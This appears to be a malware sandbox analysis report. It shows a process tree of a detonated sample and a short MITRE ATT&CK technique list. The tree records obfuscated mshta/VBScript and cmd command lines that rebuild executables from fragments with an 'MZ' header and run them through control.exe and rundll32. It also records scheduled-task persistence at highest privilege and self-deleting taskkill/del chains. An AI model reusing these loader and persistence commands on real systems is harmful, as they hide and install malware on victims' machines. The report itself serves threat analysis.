                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\zih45e4m.v31\any.exe
                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                    PID:9176
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\brwkfokr.mo1\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                    PID:8460
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\50-95587-f9b-a649e-735c543ca39b9\Puleleqaeja.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\50-95587-f9b-a649e-735c543ca39b9\Puleleqaeja.exe"
                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                    PID:5280
                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                      dw20.exe -x -s 2596
                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                        PID:9032
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:6764
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:5484
                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\nGelImSWcy7NKSfwwvXcUR8G.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\nGelImSWcy7NKSfwwvXcUR8G.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:5524
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im nGelImSWcy7NKSfwwvXcUR8G.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\nGelImSWcy7NKSfwwvXcUR8G.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:4920
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                    taskkill /im nGelImSWcy7NKSfwwvXcUR8G.exe /f
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:5236
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                    PID:8752
                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\BfDLoN4ywwuF7AJ2K2EkLwOj.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\BfDLoN4ywwuF7AJ2K2EkLwOj.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:6108
                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\k3l_HGrXIqXTDHVX5cipGDm2.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\k3l_HGrXIqXTDHVX5cipGDm2.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:5436
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\k3l_HGrXIqXTDHVX5cipGDm2.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\k3l_HGrXIqXTDHVX5cipGDm2.exe"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4700
                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Gn4RyGk6CcdnYrfPmvpu_URG.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Gn4RyGk6CcdnYrfPmvpu_URG.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:6024
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\Gn4RyGk6CcdnYrfPmvpu_URG.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\Gn4RyGk6CcdnYrfPmvpu_URG.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:6592
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\Gn4RyGk6CcdnYrfPmvpu_URG.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\Gn4RyGk6CcdnYrfPmvpu_URG.exe" ) do taskkill /f /Im "%~nxQ"
                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                PID:6052
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE
                                                                                                                                                                                                                                                                  ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9
                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                    PID:2308
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))
                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                        PID:6252
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ( "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" ) do taskkill /f /Im "%~nxQ"
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                            PID:5856
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VBSCripT: cLOsE ( cReAteObJeCt ( "WscRIpt.ShelL" ). RuN ( "CMd.exE /c eCHo | seT /P = ""MZ"" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q * " , 0 , TrUE ) )
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                            PID:1984
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c eCHo | seT /P = "MZ" > Xj5YWD.Tg &CopY /b /y xj5YWD.Tg + pgMY8C.~+ nmS1._ ..\SmD2fE1.N & STart control ..\SMD2fE1.N &DeL /Q *
                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                PID:3644
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                                    PID:3348
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>Xj5YWD.Tg"
                                                                                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                                                                                      PID:6960
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                      control ..\SMD2fE1.N
                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                        PID:6252
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                                            PID:2248
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\SMD2fE1.N
                                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                                PID:1280
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\SMD2fE1.N
                                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                                    PID:5400
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                        taskkill /f /Im "Gn4RyGk6CcdnYrfPmvpu_URG.exe"
                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                        PID:6160
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\DqPUbgcVrOoM_ERnOe4ngehx.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\DqPUbgcVrOoM_ERnOe4ngehx.exe"
                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                    PID:2216
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\3451236.scr
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\3451236.scr" /S
                                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                                        PID:4872
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2195106.scr
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2195106.scr" /S
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                          PID:1324
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7438655.scr
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7438655.scr" /S
                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                            PID:6100
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\8529217.scr
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\8529217.scr" /S
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:7144
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\7805160.scr
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\7805160.scr" /S
                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                PID:5724
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri140015c14bc2a843b.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:4692
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri140015c14bc2a843b.exe
                                                                                                                                                                                                                                                                                              Fri140015c14bc2a843b.exe
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri1434b74af36.exe
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:3488
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1434b74af36.exe
                                                                                                                                                                                                                                                                                                Fri1434b74af36.exe
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                PID:2864
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1434b74af36.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1434b74af36.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                  PID:632
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1434b74af36.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4B08D246\Fri1434b74af36.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                      PID:2164
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                                                        09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                        PID:4224
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                            PID:5032
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                PID:1388
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                                                                PID:4856
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                    PID:4492
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                                                                        PID:4580
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                          PID:2052
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                                                          control .\R6f7sE.I
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                            PID:5084
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                PID:4748
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                                                                                    PID:3648
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                                                                                                                        PID:5180
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                            taskkill /F -Im "Fri1434b74af36.exe"
                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                            PID:4756
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                              PID:4864
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:4804
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:2476
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1501.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1501.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:2232
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6D25.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\6D25.exe
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:5844
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9762.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9762.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:3900
                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\werfault.exe
                                                                                                                                                                                                                                                                                                                        werfault.exe /h /shared Global\e20849ae1e644770a140adb68fc3cc62 /t 3324 /p 3272
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:5892
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:5824
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:8336
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\cadfeur
                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\cadfeur
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:212
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:2132
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\IME\SHARED\imebroker.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\IME\SHARED\imebroker.exe -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:2328
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:6712
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding A64229BB4A60423330637954E7E01AE1 C
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                          PID:8644
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 2A28CE43F30616F7BB86279D392263CB
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:6532
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                              PID:6324
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding CD9E782A70F346BE40E6FC7304F79218 E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:324
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                            PID:876
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                PID:3212
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\cadfeur
                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\cadfeur
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:8560
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:8844
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:6936
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7384
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\cadfeur
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\cadfeur
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:8996
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\wgdfeur
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6376

                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                        Execution

                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1031

                                                                                                                                                                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1060

                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1053

                                                                                                                                                                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1497

                                                                                                                                                                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                                                                                                                                                                        1
                                                                                                                                                                                                                                                                                                                                                        T1112

